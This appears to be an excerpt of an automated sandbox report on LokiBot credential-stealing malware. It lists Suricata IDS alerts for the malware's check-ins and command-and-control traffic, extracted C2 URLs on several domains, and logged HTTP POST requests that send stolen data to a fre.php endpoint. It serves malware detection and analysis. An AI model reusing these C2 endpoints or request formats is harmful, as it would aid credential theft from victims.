            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49705 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49736
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49811 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49811 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49815 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49705
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49814 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49783 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49783 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49809
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49760 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49760 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49783 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49783 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49812 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49811 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49812 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49811 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49730
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49759
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49702 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49812 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49702 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49812 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49804 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49812
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49816 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49816 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49760
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49816 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49815 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49815 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49710
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49816 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49804 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49837 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49810 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49810 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49837 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49810 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49815 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49816 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49815 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49837 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49739 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49801 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49814 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49801 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49810 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49801 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49815
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49804 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49816
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49814 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49783
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49765
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49814 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49814 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49810 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49814
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49837 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49837 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49820 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49801 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49820 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49820 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49801 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49770 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49770 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49740 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49740 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49768 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49768 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49740 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49770 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49804 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49820 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49821 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49792 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49792 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49744
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49792 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49837
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49770 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49820 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49770 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49731
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49818 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49818 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49818 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49768 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49840 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49818 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49804
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49792 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49820
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49818 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49792 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49798 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49798 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49818
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49792
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49831 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49831 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49801
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49823 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49823 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49823 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49838 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49838 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49841 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49838 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49841 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49841 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49823 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49823 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49838 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49838 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49841 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49841 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49840 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49810
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49840 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49841
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49778 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49778 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49778 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49768 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49768 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49840 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49702 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49702 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49706
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49739
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49768
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49702
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49821 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49718 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49718 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49708 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49831 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49708 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49821 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49729 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49770
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49729 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49729 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49821 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49821 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49823
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49775 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49775 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49808 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49775 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49840 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49838
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49775 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49738
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49781 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49781 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49781 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49781 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49781 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49807 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49781
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49807 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49807 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49811
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49807 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49718 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49798 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49831 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49842 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49842 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49831 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49798 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49798 -> 188.114.97.3:80
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: https://dddotx.shop/Mine/PWS/fre.php
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close
